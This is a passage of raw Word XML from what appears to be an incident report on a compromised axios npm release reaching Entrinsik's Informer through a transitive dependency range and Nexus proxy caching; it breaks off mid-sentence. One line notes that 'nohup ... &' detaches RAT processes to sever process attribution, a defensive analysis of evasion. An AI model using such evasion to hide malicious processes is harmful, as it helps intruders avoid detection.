    <w:p w14:paraId="278CFA78" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>nohup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ... &amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> detaches RAT processes from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>npm's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> process tree, severing process attribution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA79" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="6" w:color="ECF0F1"/>
        </w:pBdr>
        <w:spacing w:before="450" w:after="225"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri;Arial;sans-serif" w:hAnsi="Calibri;Arial;sans-serif" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:color w:val="1A3C6E"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
        </w:rPr>
        <w:t>4. Root Cause Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA7A" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="360" w:after="140"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri;Arial;sans-serif" w:hAnsi="Calibri;Arial;sans-serif" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri;Arial;sans-serif" w:hAnsi="Calibri;Arial;sans-serif"/>
          <w:b w:val="0"/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4.1 How the Compromised Version Entered Entrinsik's Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA7B" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The root cause within Entrinsik's infrastructure is a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">transitive dependency version mismatch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">combined with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Nexus proxy-repository lazy-fetch cache behavior during the attack window</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA7C" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> Direct dependency pinning was correct but insufficient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Informer's </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>package.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> correctly pins </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>axios</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>": "1.11.0"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> as an exact direct dependency. This pinned version was never itself compromised.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA7D" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Transitive dependency used an open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>semver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> range</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>ibm_db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> package, another direct dependency of Informer, declares its own </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>axios</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> dependency as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>axios</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>": "^1.12.0"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (i.e. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>&gt;=1.12.0 &lt;2.0.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA7E" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> The pinned version could not deduplicate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Because Informer's pinned </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>axios@1.11.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> does not satisfy </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>ibm_db</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>^1.12.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> range (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>1.11.0 &lt; 1.12.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>npm's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> dependency resolver installs a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>separate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> copy of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>axios</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> under </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>ibm_db</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> own </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>node_modules</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> subtree, resolved to the latest version satisfying </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>^1.12.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA7F" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nexus </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>lazy-fetch</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> brought in the compromised version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Entrinsik's Nexus </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> proxy repository acts as a caching layer that lazily fetches packages from the public </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> registry on first request for an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>uncached</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> version. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>An</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">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install</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> was performed between 20:21 EDT and 23:15 EDT on March 30 (the attack window</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>), and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> requested a version of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>axios</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> satisfying </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>^1.12.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> that was not yet in the Nexus cache. Nexus fetched the latest satisfying version from public </w:t>
      </w:r>
